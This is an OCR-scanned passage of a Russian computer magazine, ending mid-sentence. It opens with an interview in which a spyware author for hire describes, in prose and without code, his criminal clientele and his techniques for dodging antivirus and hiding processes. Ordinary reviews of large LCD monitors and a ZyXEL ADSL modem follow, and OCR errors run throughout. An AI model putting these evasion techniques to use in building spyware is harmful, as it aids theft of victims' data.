©) КОМУ НУЖНЫ ШПИОНЫ И ВИРУСЫ? 


Заказчики себя не раскрывают, но, судя по 
самим заказам, это спаммеры, рассылаю- 


щие рекламу чужими «руками», мошенники, кра- 
дущие номера кредитных карт и WebMoney, раз- 
личные «темные ребята», интересующиеся базами 
данных государственных учреждений и корпора- 
ций. Всем им нужны программы, которые умеют 
внедряться в атакуемый компьютер и тайком вы- 
носить оттуда информацию. 


КАК ИСКАТЬ КЛИЕНТОВ? 
< ИСПОЛЬЗОВАТЬ ОБЪЯВЛЕНИЯ 


С ФОРУМОВ ИЛИ ЭТО ПАЛЕВО? 


объявлений, но связываться с ними — без 
мазы. Ты никогда не знаешь, кто сидит на другой 
стороне: стукач или кидала. Риск загреметь за ре- 
шетку за хакерские дела, в общем-то, минимален. 
Гораздо опаснее то, что на хвост могут сесть бан- 
дитские группировки и заставить работать на себя, 
причем за смешные деньги и с вероятностью быть 
убитым в чужих разборках. Ну кому это нужно? 
Лучше находить клиентов среди хорошо проверен- 
ных знакомых. 


© Действительно, на форумах до фига таких 


НА ЧЕМ ПИШЕШЬ ШПИОНОВ? 


© НА АССЕМБЛЕРЕ? 


Боюсь разочаровать, но заниматься этим 

на ассемблере можно только из большой 
любви к ассемблеру или от нечего делать. Совре- 
менные компиляторы позволяют сделать практи- 
чески все, что угодно, и с минимальными затрата- 
ми времени (человеческого). Конечно, совсем без 
ассемблерных вставок дело не обходится, но ос- 
новная часть кода пишется на Си. 


ПОЧЕМУ ИМЕННО СИ, А НЕ СИ++? 
€ ВСЕ СЕЙЧАС СИДЯТ ИМЕННО 
НА НЕМ! 


© И создают себе проблемы, мужественно их 

преодолевая. Возможно, Си++ — хороший 
язык, но его достоинства уравновешиваются недо- 
статками и, в первую очередь, — ограничением 
свободы программиста, запретом многих форм 
трюкачества. Сама идеология Си+- провоцирует 
программиста на решение задачи в общем виде, в 
то время как в частном она решается в десять раз 
быстрее и в сто раз эффективнее. 


СКОЛЬКО ВРЕМЕНИ ЗАНИМАЕТ 


© РАЗРАБОТКА НОВОГО ШПИОНА? 


Это зависит от самого шпиона. Только 
«нового» в нем будет немного. Основную 
сложность представляет реализация модулей, 
ответственных за внедрение, сокрытие процес- 


сов и файлов, установку back-door'a и т.д. Но все 
это уже реализовано в моей собственной би- 
блиотеке, так что фактически шпион конструиру- 
ется из готовых блоков, на что уходит несколько 
дней. Гораздо больше времени отнимает тести- 
рование и проверка на совместимость с новыми 
версиями Windows. Шпионы со «знаком каче- 
ства» обкатываются до недели. Конечно, библио- 
тека нуждается в развитии — совершенствова- 
нии механизмов сокрытия/внедрения, поддержке 
новых технологий и платформ (например, х86- 
64), но это происходит в «фоновом режиме», так 
сказать, в свободное время. 


© 

Когда-то пользовался, но потом признал 
($) эту практику порочн-и и послал все про- 
текторы на три икса. Во-п-овых, аверисты не 
спят и оперативно учатся р *“паковывать новые 
протекторы, так что такая мера ни от чего не спа- 
сет. Во-вторых, все мои шпипны пишутся индиви- 
дуально и, хотя они содержат некоторые по- 
стоянные фрагменты (Ty же `.помянутую библио- 
теку), при перекомпиляции дьугим компилятором 
с другими ключами они преображаются до неуз- 
наваемости. В-третьих, гораздо выгоднее ис- 
пользовать свой встроенный мини-шифратор на 
основе 5$Е-команд, с эмуляцией которых у аве- 
ров большие проблемы. Да что Tam SSE, многие 
команды 8086 процессора (такие, например, как 
ААА) большинством аверов эмулируются непра- 
вильно, а, значит, они не смогут расшифровать 
код, даже если расшифровщик будет состоять 
всего из нескольких машинных команд. Во вся- 
ком случае, это мой код, за который я отвечаю и 
прилагаю все усилия, чтобы он работал правиль- 
но. Популярные протекторы содержат массу 
ошибок, и доверить им защиту своих шпионов я 
не могу, просто не имею на это морального права 
перед своими клиентами. 


© 

Гарантии обычные — то есть никаких га- 
($) рантий. По-другому просто не получится. 
Никто не застрахован от ошибок ия в том числе. 
Естественно, опытный хакер, умеющий держать 
отладчик в руках, сможет обнаружить шпиона, 
если сильно озаботится этой целью. Но для это- 
го ему придется проделать большую и кропотли- 
вую работу, которой никто не будет заниматься 
просто так, если нет подозрения. А подозрений 
не будет, потому что мои шпионы ведут себя 
максимально корректно, обходят защитные си- 
стемы, не замедляют работу компьютера и ни с 
чем не конфликтуют. Хотя проколы и со мной то- 
же случаются... 


ПОЛЬЗУЕШЬСЯ ЛИ УПАКОВЩИКАМИ 
И ПРОТЕКТОРАМИ ДЛЯ 
ПРОТИВОДЕЙСТВИЯ АВЕРАМ? 


А КАКИЕ ГАРАНТИИ КЛИЕНТАМ? 
ВОЗМОЖНО ЛИ ЗАСЕЧЬ ШПИОНОВ? 


ЧТО ЗА ПРОКОЛЫ? КАКИЕ МОГУТ 
БЫТЬ ПРОКОЛЫ? КАК ПРИМЕР. 


Например, однажды мой шпион случайно 
отобрал фокус у окна winlogon'a и не воз- 
вратил, некоторые пользователи обратили на 
это внимание (так как раньше они просто наби- 
рали пароль при входе в систему, а теперь на ок- 
но приходилось кликать). Вот мой шпион и пого- 
рел. Несколько раз напарывался на сюрпризы 
недокументированных возможностей, неожи- 
данно менявшихся в очередном Service pack'e 
без всякого предупреждения и лишающих шпио- 
на работоспособности, а меня — репутации и за- 
работка. Сейчас я полностью отказался от ис- 
пользования недокументированных возможно- 
стей и намерен придерживаться той же страте- 
гии и в дальнейшем. 


Представь себе, написать шпиона, исполь- 
© зующего только документированные воз- 
можности, вполне реально, и он от этого только 
выиграет. Да, в использовании недокументиро- 
ванных возможностей есть какой-то романтизм, 
но в серьезных разработках использовать их не- 
допустимо! Это могут делать либо очень опытные 
гуру, либо пионеры. Я же не отношусь ни ктем, ни 
к другим. Кстати, М$ в последнее время «рассе- 
кретила» множество функций, бывших ранее не- 
документированными, чем серьезно облегчила 
мне и моим коллегам жизнь. 


© 

Это как раз проще всего. Достаточно пе- 
© рехватить ряд низкоуровневых функций, 
например, внедрив за концом их пролога jump на 
свой обработчик. Почему после пролога, как по- 
ступает большинство шпионов? Да потому что 
уже существуют утилиты, сканирующие первые 
байты функций на предмет наличия jump'os, к TO- 
му же необходимо отслеживать открытие файла 
NTOSKRNL.EXE, чтобы никакая защита не могла 
сравнить образ памяти ядра с оригиналом. Вооб- 
ще же, лучший способ маскировки — не созда- 
вать никаких дополнительных потоков/процес- 
сов, внедряясь в уже существующие, и не дры- 
гать дисковым, держа все данные в памяти. Лю- 
бую активную маскировку достаточно легко об- 
наружить. Защите достаточно, например, прочи- 
тать диск на секторном уровне и сравнить эти 
данные с данными, возвращенными операцион- 
ной системой. Если обнаружатся различия — 
значит, кто-то маскируется. 


© 
© 


ШПИОН, И СОВСЕМ БЕЗ 
НЕДОКУМЕНТИРОВАННЫХ 
ВОЗМОЖНОСТЕЙ? ! 
РАЗВЕ ЭТО РЕАЛЬНО? 


КАКИЕ АЛГОРИТМЫ СОКРЫТИЯ 
ФАЙЛОВ И ПРОЦЕССОВ 
ТЫ ИСПОЛЬЗУЕШЬ? 


А РАЗВЕ НЕЛЬЗЯ ПЕРЕХВАТИТЬ 
ПОСЕКТОРНОЕ ЧТЕНИЕ ДИСКА? 


Можно. Но это усложняет шпиона, да ик 
тому же всего не предусмотришь. С этим, 
кстати, связан еще один мой прокол. Я не учел су- 
ществование У$В-носителей и некоторых других 
типов дисков, вот их и не перехватывал. А следо- 
вало бы. Но всего же не учтешь. К тому же некото- 
рые ревизоры сканируют диск еще до загрузки 
операционной системы, а потому в принципе не 
могут быть перехвачены шпионом. То есть, могут 
конечно, но для этого шпион должен внедряться в 
первичный загрузчик. Хорошо, когда он располо- 
жен на IDE-gucke, а если это RAID или SCSI? Со- 
крытие своего присутствия (то есть стелсирова- 
ние) — изначально плохая и порочная идея, по- 
скольку она порождает проблемы, решение кото- 
рых порождает новые проблемы. Впрочем, это 
только мое личное мнение, и если заказчик хочет 
получить стелсирование — он его получает. Но я 
сразу же предупреждаю его, чем это чревато. 


© 
© Да. Но на самом деле их гораздо больше, 
чем ты думаешь. Хороший шпион — боль- 
шая редкость, и его конструкция отрабатывается 
годами: просто так сесть и написать ни у кого не 
получится, особенно если ты ничего круче домаш- 
него ПК с ЮЕ-винчестером и Windows XP Professio- 
па! в глаза не видел! Необходимо иметь опыт рабо- 
ты с различным оборудованием, исследовать сот- 
ни защитных механизмов (типа брандмауэров, си- 
стем обнаружения вторжения ит. д.). Причем знать 
не только теорию, но и практический расклад, и 
расстановку сил. То есть реальное положение дел, 
определяемое пресловутым человеческим факто- 
ром. И много чего еще... 


© 
© 


В СОЗДАНИИ ШПИОНОВ 
СТОЛЬКО ТОНКОСТЕЙ... 


© А КАК НАСЧЕТ ШПИОНАЖА В НИКСАХ? 
© Технически это весьма просто. Если только 

это He OpenBSD, и админ не латает систе- 
му с параноической усердностью. У меня есть нес- 
колько готовых шпионов, но спрос на них порядка 
на два меньше, чем Ha Windows. Но, возможно, в 
будущем ситуация изменится, поэтому шпионы 
необходимо подготовить заранее. 


КОМУ ДАНО ПИСАТЬ ШПИОНЫ? 


< 
© Разработка шпионов — это удел тех, кто не 
смог (или не захотел) реализовать себя 
© как-нибудь иначе. Сверхбольших денег не 
приносит, а риск все-таки есть. Он давит на тебя 
как танк, нависает, словно осеннее небо, но... ни- 
чего другого кроме шпионов ты программировать 
не умеешь, а клепать оплеухи тебе не позволяет 
гордость. Воти... © 


ОФФТОПИК 


nard 


Icd20+ 


ТЕСТ ЖК-МОНИТОРОВ С ДИАГОНАЛЬЮ БОЛЕЕ 20 ДЮЙМОВ 


Тебе уже наверняка надоел твой ЕСО’шник с диагональю 15 дюймов, и уже 
давно хочется смотреть кино или играть в игры на большом экране, жела- 
тельно во всю стену. Такой масштаб осуществить будет сложновато и, 
главное, дороговато, но вот обзавестись качественным монитором с боль- 
шим и, если хочешь, широким экраном вполне реально. Правда, надо ос- 
ознавать, что уровень цен пока остается высоким. 

> | методика тестирования. Для начала рассматривалось время отклика 
пикселей — один из самых важных параметров для жидкокристаллических 
мониторов. Для этого с помощью известной утилиты ТЕТ{е${ на экран выво- 
дился черный фон, по которому быстро перемещался белый квадратик. Чем 
сильнее он размывается, тем выше время реакции, а значит, тем хуже будут 
отображаться динамичные сцены из фильмов или игр. На втором месте по 
важности стоит цветопередача — насколько правильно монитор отображает 
те или иные цвета. Для ее проверки мы использовали колориметр — он пода- 
ет на видеокарту последовательность сигналов, соответствующих различным 


оттенкам, и с помощью датчика регистрирует, насколько полученное изобра- 
жение будет соответствовать этим сигналам. На выходе мы имеем диаграмму 
с линиями, соответствующими трем основным цветам палитры (красный, зе- 
леный, синий). В идеале они должны совпасть между собой в одну прямую и 
точно лечь на диагональ квадрата, соответствующего координатам. Любое от- 
клонение свидетельствует о некорректности отображения тех или иных цве- 
тов. Яркость и контрастность проверялись следующим образом: каждый из па- 
раметров выставлялся на максимальное и минимальное значение — чем ши- 
ре получался диапазон, тем точнее можно настроить картинку под тот или 
иной уровень освещения. Но матрица не всегда бывает сделана одинаково ка- 
чественно по всей поверхности, так что яркость в разных ее частях может раз- 
личаться. Для того чтобы это выявить, на экран выводился черный и белый 
цвет, после чего мы изучали, насколько правильно они отображаются (нет ли 
голубоватых разводов или пятен). Проверялись и углы обзора: насколько бы- 
стро начинает искажаться картинка, если поворачивать ось зрения относи- 
тельно экрана. Особое внимание обращалось на эргономичность и удобство 
использования, что в первую очередь связано с большими размерами всех ис- 
пытуемых, и то, насколько гибко их можно адаптировать под то или иное рабо- 


чее место, что должно быть немаловажным критерием при покупке. 


SAMSUNG 
SyncMaster 204B 
($562) 9 баллов 


РАЗМЕР ЭКРАНА (ВИДИМЫЙ): 20° 


МАКСИМАЛЬНОЕ РАЗРЕШЕНИЕ: 1600х1200 


ЯРКОСТЬ: 300 кд/м” 


КОНТРАСТ: 800:1 


ЛАТЕНТНОСТЬ МАТРИЦЫ: 5 мс 


УГОЛ ЗРЕНИЯ (ПО ВЕРТИКАЛИ/ 
ПО ГОРИЗОНТАЛИ): 160/160° 


ИНТЕРФЕЙСЫ: D-SUB, DVI-D 


СТАНДАРТЫ БЕЗОПАСНОСТИ: TCO’03 


МОЩНОСТЬ ДИНАМИКОВ: нет 


РАЗМЕРЫ: 444х 427.6х200 мм 


ВЕС: 7.7 кг 


-> — плюсы. Цветопередача хоро- 
шая, правда, несколько хуже, чем у 
более продвинутого собрата: линии 
красного и зеленого почти идеаль- 
но совпадают, а вот синий слегка 
смещен вверх. Латентность матри- 
цы близка к идеальной: размытие 
движущихся объектов видно лишь 
при детальном рассмотрении и ни- 
как не может сказаться на качестве 


изображения. Большие, по сравне- 
нию с конкурентами, углы обзора, 
но если смотреть на экран снизу, 
цвета все же начинают инвертиро- 
ваться. Никаких проблем с эргоно- 
микой: корпус вращается во всех 
направлениях и, что самое главное, 
его можно приподнимать или опу- 
скать относительно стола. В стани- 
не имеется поворотный круг, так 
что можно не бояться ставить Зат- 
sung SyncMaster 2046 на эмалиро- 
ванную поверхность — он ее не по- 
царапает. Меню на русском языке с 
большим количеством опций, а яр- 
кость и контрастность выведены на 
отдельные кнопки. 

> — минусы. Низкое максимальное 
значение яркости: для нормальной 
работы его хватает впритык. Засвет- 
ка матрицы неравномерная — если 
вывести белый цвет во весь экран, 
по всей его поверхности будут видны 
характерные разводы. Нет фиксато- 
ра, позволяющего ориентировать 
экран точно по горизонтали, так что 
приходится это делать вручную. 


SONY SDM-S205F 
($730) 8 баллов 


РАЗМЕР ЭКРАНА (ВИДИМЫЙ): 20.1’ 


МАКСИМАЛЬНОЕ РАЗРЕШЕНИЕ: 1600х1200 


ЯРКОСТЬ: 300 кд/м" 


КОНТРАСТ: 700:1 


ЛАТЕНТНОСТЬ МАТРИЦЫ: 16 мс 


УГОЛ ЗРЕНИЯ (ПО ВЕРТИКАЛИ/ 
ПО ГОРИЗОНТАЛИ): 178/178° 


ИНТЕРФЕЙСЫ: D-SUB, DVI-D 


СТАНДАРТЫ БЕЗОПАСНОСТИ: TCO'03 


МОЩНОСТЬ ДИНАМИКОВ: нет 


РАЗМЕРЫ: 442х411х278 мм 


ВЕС: 9.6 кг 


> плюсы. Практически идеаль- 
ная цветопередача: все линии поч- 
ти слились воедино, и лишь в нача- 
ле видно небольшое отклонение 
вверх, которое, впрочем, не может 
сильно повлиять на ситуацию. По- 
мимо яркости имеется и дополни- 
тельная подсветка матрицы, кото- 
рая является дополнительным па- 
раметром, позволяющим более ка- 
чественно регулировать изображе- 
ние. Есть и фиксированные на- 


стройки — ECO Mode: средняя, 
темная, яркая, автоформат (ручная 
настройка). Не могут не радовать 
углы обзора: даже при больших от- 
клонениях от центра картинка 
лишь чуть тускнеет. Как и многие 
его конкуренты, Sony SDM-S205F 
обладает отличной эргономикой: 
экран поворачивается практически 
во всех направлениях, а чтобы по- 
верхность стола не царапалась, на 
нижней части станины предусмо- 
трен поворотный круг. Меню отли- 
чается понятной структурой и снаб- 
жено русским языком. Sony SDM- 
S205F имеет аудиовход и выход, 
что удобно, если ты используешь 
наушники. Правда, встроенных ко- 
лонок нет. 

> — минусы. Заметная латент- 
ность матрицы: край движущегося 
по черному фону белого квадрата 
размывается. Это видно даже при 
обычном скроллинге текста. 
Поворотный круг туговат и может 
проскальзывать. Яркость и кон- 
трастность регулируются только 
из меню. 


SAMSUNG 
SyncMaster 214T 
($840) 9 баллов 


РАЗМЕР ЭКРАНА (ВИДИМЫЙ): 21.3’ 


МАКСИМАЛЬНОЕ РАЗРЕШЕНИЕ: 1600х1200 


ЯРКОСТЬ: 300 кд/м" 


КОНТРАСТ: 900:1 


ЛАТЕНТНОСТЬ МАТРИЦЫ: 8 мс 


УГОЛ ЗРЕНИЯ (ПО ВЕРТИКАЛИ/ 
ПО ГОРИЗОНТАЛИ): 178/178° 


ИНТЕРФЕЙСЫ: D-SUB, DVI-D 


СТАНДАРТЫ БЕЗОПАСНОСТИ: TCO'03 


МОЩНОСТЬ ДИНАМИКОВ: нет 


РАЗМЕРЫ: 469х466.2х228.5 мм 


ВЕС: 8.8 кг 


> — плюсы. У этого девайса поис- 
тине выдающаяся цветопередача — 
по этому параметру он вплотную 
приблизился к хорошим СВТ-диспле- 
ям: графики на диаграмме практиче- 
ски слились воедино, а значит, цвета 
будут отображаться максимально 
корректно. Латентность матрицы в 
порядке — искажений движущихся 
объектов заметно не будет. Такая же 
ситуация и с углами обзора: картин- 
ка начинает блекнуть только при 
сильных отклонениях от центральной 
оси. Сразу отмечаем отличную эрго- 
номику: экран можно вращать прак- 
тически в любых направлениях и 
точно настраивать под себя, а режим 
«портрет» делает работу с текстом 
максимально удобной. Из дополни- 
тельных особенностей можно отме- 
тить наличие входов RCA и S-VIDEO, 
позволяющих подключать различную 
видеоаппаратуру: если ты хочешь, 
например, смотреть фильм с видика 
и одновременно работать на компе, 


* 
* выбор * 


редакции 
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то специально для тебя предусмо- 
трена функция «картинка в картин- 
ке»: второе окошко возникает в пра- 
вом нижнем углу экрана. Меню по- 
дробное, с названиями на русском 
языке, правда, управлять им немно- 
го неудобно. 

>» — минусы. Немного подвела яр- 
кость — ее приходится задирать 
почти на максимум, и если ты фа- 


Lies 


нат фильмов, TO темные сцены бу- 
дут видны средне. К тому же в 
углах экрана яркость чуть выше, 
чем в центре. К сожалению, нет ав- 
томатического выбора источника 
сигнала, хотя с таким количеством 
входов это может быть и преимуще- 
ством, например, при подключении 
к интерфейсам сразу нескольких 
видеоустройств. 
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ACER AL2416 
($1016) 8 баллов 


РАЗМЕР ЭКРАНА (ВИДИМЫЙ): 24' 


МАКСИМАЛЬНОЕ РАЗРЕШЕНИЕ: 1920х1200 


ЯРКОСТЬ: 500 кд/м* 


КОНТРАСТ: 1000:1 


ЛАТЕНТНОСТЬ МАТРИЦЫ: 6 мс 


УГОЛ ЗРЕНИЯ (ПО ВЕРТИКАЛИ/ 
ПО ГОРИЗОНТАЛИ): 178/178° 


ИНТЕРФЕЙСЫ: D-SUB 


СТАНДАРТЫ БЕЗОПАСНОСТИ: TCO’03 


МОЩНОСТЬ ДИНАМИКОВ: нет 


РАЗМЕРЫ 577х457х221 мм 


ВЕС: 9.1 кг 


> плюсы. Этот монитор спе- 
циально предназначен для любите- 
лей кино, так как экран у него имеет 
широкий формат. Очень хорошая 
цветопередача: все линии почти 
совпали, если не считать резкого 
скачка синего в самом начале ди- 
апазона. Яркость сама по себе не- 
высокая, но если ее хорошо сбалан- 
сировать с контрастностью, то мож- 
но получить почти любые параме- 
тры изображения. Засветка матри- 
цы равномерная, так что искажений 
цветов объектов в разных ее частях 
не будет. С углами обзора никаких 


проблем, что весьма важно для «ки- 
ношного» монитора. 

> — минусы. Латентность матрицы 
все же высоковата — за движу- 
щимся квадратом виден заметный 
шлейф, но он все же относительно 
невелик. Навигация по меню неу- 
добная, да и отсутствие русского 
языка несколько расстраивает. К 
сожалению, отсутствует цифровой 
вход, что для такого девайса стран- 
но. Поворачивать экран можно 
лишь вверх или вниз, что не особо 
удобно, если учесть размеры 
устройства. 


ViewSonic VP2030b 
($898) 8 баллов 


РАЗМЕР ЭКРАНА (ВИДИМЫЙ): 20.1’ 
МАКСИМАЛЬНОЕ РАЗРЕШЕНИЕ: 1600х1200 
ЯРКОСТЬ: 300 кд/м” 

КОНТРАСТ: 1000:1 

ЛАТЕНТНОСТЬ МАТРИЦЫ: 8 мс 

УГОЛ ЗРЕНИЯ (ПО ВЕРТИКАЛИ/ПО ГОРИ- 
ЗОНТАЛИ): 170/170° 

ИНТЕРФЕЙСЫ: D-SUB, DVI-D 

СТАНДАРТЫ БЕЗОПАСНОСТИ: TCO'99 
МОЩНОСТЬ ДИНАМИКОВ: нет 

РАЗМЕРЫ: 468х403х315 мм 

ВЕС, КГ: 9 кг 


> плюсы. Широкие диапазоны 
яркости и контрастности, к тому же 
для их изменения совершенно не 
обязательно лезть в меню (имеют- 
ся специальные кнопки). Вся по- 
верхность экрана подсвечивается 
равномерно. Большие углы 0630- 
ра: если тебе нравится смотреть 
фильмы в большой компании, то 
для всех присутствующих изобра- 
жение будет качественным, даже 
если они находятся сильно в сто- 
роне от монитора. Хорошо выпол- 
нена станина, поддерживающая 


покупка 


* лучшая 
* 


экран — она позволяет настроить 
экран точно под твой взгляд, вне 
зависимости от того, высоко ли у 
тебя расположен стол. Для тех, кто 
много работает с текстом, имеется 
режим «портрет». Из дополнитель- 
ных возможностей отмечаем 
встроенный У$В-концентратор на 
четыре порта. В комплект поставки 
предусмотрительно входит соот- 
ветствующий кабель. 


> минусы. Графики, полученные 
колориметром, заметно расходятся, 
что все же хуже, чем у некоторых 
конкурентов. Велико время отклика 
пикселя: за движущимся квадратом 
виден заметный шлейф. Станина 
сделана в виде креста, из-за этого 
передние ее части слишком сильно 
выдвинуты вперед и могут мешать. 
Меню сделано немного нелогично и 
в нем нет русского языка. 


МЕС Multisync 
20WGX2 
($800) 9 баллов 


РАЗМЕР ЭКРАНА (ВИДИМЫЙ): 24” 


МАКСИМАЛЬНОЕ РАЗРЕШЕНИЕ: 1680х1050 


ЯРКОСТЬ: 470 кд/м" 


КОНТРАСТ: 1600:1 


ЛАТЕНТНОСТЬ МАТРИЦЫ: 6 мс 


УГОЛ ЗРЕНИЯ (ПО ВЕРТИКАЛИ/ПО ГОРИ- 
ЗОНТАЛИ): 178/178° 


ИНТЕРФЕЙСЫ: D-SUB 


СТАНДАРТЫ БЕЗОПАСНОСТИ: ТСО’03 


МОЩНОСТЬ ДИНАМИКОВ: нет 


РАЗМЕРЫ: 471.4х391.5х203 мм 


ВЕС: 7 кг 


> плюсы. Этот девайс обладает 
лучшей во всем тесте четкостью кар- 
тинки: все контрастные переходы — 
максимально тонкие, что особенно 
заметно при выведении на экран 
мелких шрифтов, и если у конкурен- 
тов они бы просто смазались, то у 
МЕС Miltisync 20WGX2 — нет. Цве- 
топередача близка к идеалу: если 
не считать небольшого расхождения 
в начале диапазона, линии почти 
полностью совпали. Яркость и кон- 


трастность на высоком уровне, 

и для их изменения совсем необяза- 
тельно лезть глубоко в меню. Очень 
хорошая латентность — у движу- 
щихся объектов лишь чуть заметно 
размывается край. Углы обзора ни- 
каких нареканий не вызывают. Есть 
встроенный разветвитель USB на 
четыре порта, причем два из них 
расположены на левом торце девай- 
са для более удобного подключения 
периферии. Для навигации по меню 
предусмотрено три кнопки и один 
джойстик, что делает переход по оп- 
циям максимально понятным. Чтоб 
шлейфы не перекручивались, на 
станине предусмотрено специальное 
углубление, куда они все загоняются. 
> — минусы. Если вывести черный 
цвет во весь экран, то в правом ни- 
жнем углу будет виден характерный 
белесый развод (он будет виден 
всегда при просмотре темного 
изображения). Индикатором работы 
служит синий светодиод, яркий 

луч которого может отвлекать от ра- 
боты. На матрице предусмотрено 
защитное покрытие, которое 

сильно бликует. 
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BENQ FP202W 
($528) 7 баллов 


РАЗМЕР ЭКРАНА (ВИДИМЫЙ): 20.1” 


МАКСИМАЛЬНОЕ РАЗРЕШЕНИЕ: 1680х1050 


ЯРКОСТЬ: 300 кд/м” 


КОНТРАСТ: 600:1 


ЛАТЕНТНОСТЬ МАТРИЦЫ, МС: 6 мс 


УГОЛ ЗРЕНИЯ (ПО ВЕРТИКАЛИ/ПО ГОРИ- 
ЗОНТАЛИ): 170х170° 


ИНТЕРФЕЙСЫ: D-SUB, DVI-D 


СТАНДАРТЫ БЕЗОПАСНОСТИ: TCO’92 


МОЩНОСТЬ ДИНАМИКОВ: нет 


РАЗМЕРЫ: 396.7х479.6х169.9 мм 


ВЕС: 5.7 кг 


> — плюсы. Еще один широко- 
экранный монитор, на этот раз под- 
держивающий разрешение 
1680*1050. Неплохое время отклика 
пикселей: формы перемещающихся 
объектов не искажены, что важно 
для качественного отображения ди- 
намических сцен в фильмах. Яр- 
кость и контрастность не самые вы- 
сокие в обзоре, но для обычной ра- 
боты их будет вполне достаточно, к 
тому же во всех частях матрицы эти 
параметры имеют одинаковое зна- 
чение. 

> — минусы. Все кнопки управле- 
ния и подписи к ним расположены 
на правом торце монитора, что соз- 


дает большие проблемы для навига- 
ции. Чтобы узнать назначение той 
или иной кнопки, тебе ничего не 
останется, как заглядывать за мони- 
тор. К тому же все иконки никак не 
выделены цветом (это просто кана- 
вки, выдавленные в корпусе), так 
что различить их в условиях слабого 
освещения практически невозмож- 
но. Самая слабая в обзоре цветопе- 


редача: все три графика сильно рас- 
ходятся между собой, имеют серьез- 
ные перепады в конце и начале ди- 
апазона, а в середине видны замет- 
ные искривления. При изменении 
разрешения экрана может некор- 
ректно сработать автоматическая 
настройка, и изображение смещает- 
ся примерно на пять сантиметров 
влево. 
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ACER AT2001 
($590) 7 баллов 


РАЗМЕР ЭКРАНА (ВИДИМЫЙ): 20.1” 
МАКСИМАЛЬНОЕ РАЗРЕШЕНИЕ: 800х600 
ЯРКОСТЬ: 450 кд/м? 

КОНТРАСТ: 500:1 

ЛАТЕНТНОСТЬ МАТРИЦЫ: 16 мс 

УГОЛ ЗРЕНИЯ (ПО ВЕРТИКАЛИ/ПО ГОРИ- 
ЗОНТАЛИ): 160/120° 

ИНТЕРФЕЙСЫ: D-SUB, RCA, S-VIDEO, TV, 
SCART 

СТАНДАРТЫ БЕЗОПАСНОСТИ: TCO’03 
МОЩНОСТЬ ДИНАМИКОВ: 2х3 вт 
РАЗМЕРЫ: 495.9х468.2х198.4 мм 

ВЕС: 7.8 кг 


> — плюсы. Это не просто монитор, 
а целый развлекательный центр! К 
нему можно подключать не только 
компьютер, но и практически любую 
видеотехнику посредством разъе- 
мов RCA, S-VIDEO, SCART. Есть 
встроенный ТВ-тюнер, который ока- 
зался достаточно чувствительным, а 
потому поймал все основные кана- 
лы. В корпусе имеются колонки, ка- 
чество которых сравнимо с анало- 
гичными в обычном телевизоре. 
Очень широкие диапазоны измене- 


ния яркости и контрастности. В ком- 
плект поставки входит пульт дистан- 
ционного управления. 

3» — минусы. Разрешение экрана 
всего лишь 800х600, что по совре- 
менным параметрам очень невелико, 
так что использовать ACER AT2001 в 
качестве монитора весьма неудобно. 
Цветопередача не самая лучшая, 
особенно по сравнению с конкурен- 
тами: на диаграмме видно, что все 
три линии существенно расходятся. 
Латентность матрицы также оставля- 
ет желать лучшего — за перемещаю- 
щимися объектами виден заметный 
шлейф. ТВ-тюнер плохо «ловит» звук 
— он получается с заметными поме- 
хами в виде равномерного потрески- 
вания. Слабоподвижный экран: пово- 
рачивать его можно только вверх- 
вниз. Маленькие углы обзора, при- 
чем как вертикальные, так и горизон- 
тальные, что особенно неприятно при 
использовании ACER АТ2001 в каче- 
стве телевизора. К сожалению, от- 
сутствует цифровой вход. Разъем 
для наушников расположен на за- 
дней панели, там же, где и все дру- 
гие интерфейсы, что несколько 
осложняет подключение. 


> — выводы. Как видно из теста, современный рынок мониторов с боль- 
шим экраном довольно разнообразен, так что любой пользователь сможет 
найти девайс точно для своих нужд. Что касается наших оценок: «Лучшей 


покупкой» стал NEC Miltisync 20WGX2, показавший хорошее качество изо- 
бражения, а «Выбор редакции» получил Samsung SyncMaster 214T за от- 
личную функциональность и замечательную картинку © 


ТЕСТИРУЕМ ZYXEL P-660RU EE 


технические характеристики: 


ИНТЕРФЕЙС С КОМПЬЮТЕРОМ: Ethernet, USB 2.0 


зухель, коннект! 


СТАНДАРТ: ADSL2+ 


СКОРОСТЬ ПЕРЕДАЧИ ДАННЫХ: до 24 Мбит/сек 


ПИТАНИЕ: адаптер 2208 


УДАЛЕННОЕ АДМИНИСТРИРОВАНИЕ: web-6payzep, telnet 


ПОДДЕРЖКА DHCP: есть 


Тебе необходимо стабильное под- 
ключение к интернету и высокая 
скорость? Местные локальные сети 
требуют денег за протяжку кабеля, 
а пользователи жалуются на каче- 
ство связи? Подключайся к Сети по- 
средством ADSL-mogema и оцени 
скорость доступа к интернету. 
Конкуренция на рынке теле- 
коммуникаций, и, в частности, 
в сфере предоставления услуг связи 
с глобальной Сетью, становится все 
более жесткой. Если некоторое вре- 
мя назад подключение к интернету в 
основном осуществлялось no Dial-Up 
модему, то теперь все чаще появля- 
ется выбор между районной LAN 
и медной парой с модемом ADSL. 
Фирма ZyXEL, известная своими ка- 
чественными девайсами, выпустила 
модель, которая способна порадо- 
вать не только владельца скромного 
компьютера, но даже обладателя 
небольшого парка машин. 
> = чо OH может? Маленькая чер- 
ная коробочка (не больше пепельни- 
цы) и есть новый модем. Поддержка 
технологии ADSL2+ оставляет не- 
плохой задел на будущее, и ты смо- 
жешь спокойно пережить переход 
на более высокие скорости, когда 
провайдер начнет предоставлять та- 
кие тарифы. На задней панели раз- 
местились выходы питания, 1 порт 
USB, 1 порт RJ-45 Ethernet и теле- 
фонной пары. В комплект включены 
все необходимые кабели и адапте- 
ры. Подключить модем к компьюте- 
ру ты можешь через USB — в этом 
случае у тебя появится новое сете- 
вое устройство. Однако ничего не 
мешает тебе подсоединить его к се- 


тевой карте своего компьютера. Бо- 
лее того, если у тебя уже есть нес- 
колько компьютеров, объединенных 
в локальную сеть, ты можешь про- 
сто воткнуть сетевой шнур в модем, 
и встроенный сервер ОНСР сам про- 
пишет все необходимые настройки. 
Нужно только настроить сам модем 
(хотя бы ввести логин и пароль). 
Управление очень простое: ты вво- 
дишь IP девайса в браузере и попа- 
даешь на страницу настройки моде- 
ма. Все меню — на английском 
(есть список, включающий несколь- 
ко европейских языков, среди кото- 
рых нет русского). Помимо непо- 
средственных функций модема, Zy- 
ХЕ P-660RU EE имеет пакетный 
фильтр, умеет транслировать сете- 
вые адреса (МАТ) и служит маршру- 
тизатором. 

> = зачем это нужно. Если ты уже 
подключился к интернету по ADSL, и 
тебе выдали маленький УЗВ-модем, 
то наверняка после каждой переза- 
грузки компьютера ты сидишь и 
ждешь, когда же установится соеди- 
нение. ZyXEL P-660RU EE подклю- 
чен к Сети постоянно, и тебе 
необходимо лишь установить соеди- 
нение с самим девайсом, что займет 
